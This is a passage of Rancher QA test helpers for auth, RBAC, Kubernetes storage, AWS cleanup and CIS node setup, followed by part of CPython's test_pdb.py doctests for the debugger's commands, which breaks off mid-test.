if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
while True and socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
create a webscoket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-multinode-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-multinode-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
# the workloads under System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
|
test_pdb.py | # A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test.support import os_helper
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def reset_Breakpoint():
import bdb
bdb.Breakpoint.clearBreakpoints()
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'commands 10', # out of range
... 'commands a', # display help
... 'commands 4', # already deleted
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) commands 10
*** cannot set commands: Breakpoint number 10 out of range
(Pdb) commands a
*** Usage: commands [bnum]
...
end
(Pdb) commands 4
*** cannot set commands: Breakpoint 4 already deleted
(Pdb) continue
3
4
"""
def test_pdb_breakpoints_preserved_across_interactive_sessions():
"""Breakpoints are remembered between interactive sessions
>>> reset_Breakpoint()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'import test.test_pdb',
... 'break test.test_pdb.do_something',
... 'break test.test_pdb.do_nothing',
... 'break',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) import test.test_pdb
(Pdb) break test.test_pdb.do_something
Breakpoint 1 at ...test_pdb.py:...
(Pdb) break test.test_pdb.do_nothing
Breakpoint 2 at ...test_pdb.py:...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'break pdb.find_function',
... 'break',
... 'clear 1',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
(Pdb) break pdb.find_function
Breakpoint 3 at ...pdb.py:97
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep yes at ...test_pdb.py:...
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 1
Deleted breakpoint 1 at ...test_pdb.py:...
(Pdb) continue
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'break',
... 'clear 2',
... 'clear 3',
... 'continue',
... ]):
... pdb.run('print()')
> <string>(1)<module>()...
(Pdb) break
Num Type Disp Enb Where
2 breakpoint keep yes at ...test_pdb.py:...
3 breakpoint keep yes at ...pdb.py:...
(Pdb) clear 2
Deleted breakpoint 2 at ...test_pdb.py:...
(Pdb) clear 3
Deleted breakpoint 3 at ...pdb.py:...
(Pdb) continue
"""
def test_pdb_pp_repr_exc():
"""Test that do_p/do_pp do not swallow exceptions.
>>> class BadRepr:
... def __repr__(self):
... raise Exception('repr_exc')
>>> obj = BadRepr()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'p obj',
... 'pp obj',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_pp_repr_exc[2]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) p obj
*** Exception: repr_exc
(Pdb) pp obj
*** Exception: repr_exc
(Pdb) continue
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_pdb_whatis_command():
"""Test the whatis command
>>> myvar = (1,2)
>>> def myfunc():
... pass
>>> class MyClass:
... def mymethod(self):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'whatis myvar',
... 'whatis myfunc',
... 'whatis MyClass',
... 'whatis MyClass()',
... 'whatis MyClass.mymethod',
... 'whatis MyClass().mymethod',
... 'continue',
... ]):
... test_function()
--Return--
> <doctest test.test_pdb.test_pdb_whatis_command[3]>(2)test_function()->None
-> import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
(Pdb) whatis myvar
<class 'tuple'>
(Pdb) whatis myfunc
Function myfunc
(Pdb) whatis MyClass
Class test.test_pdb.MyClass
(Pdb) whatis MyClass()
<class 'test.test_pdb.MyClass'>
(Pdb) whatis MyClass.mymethod
Function mymethod
(Pdb) whatis MyClass().mymethod
Method mymethod
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
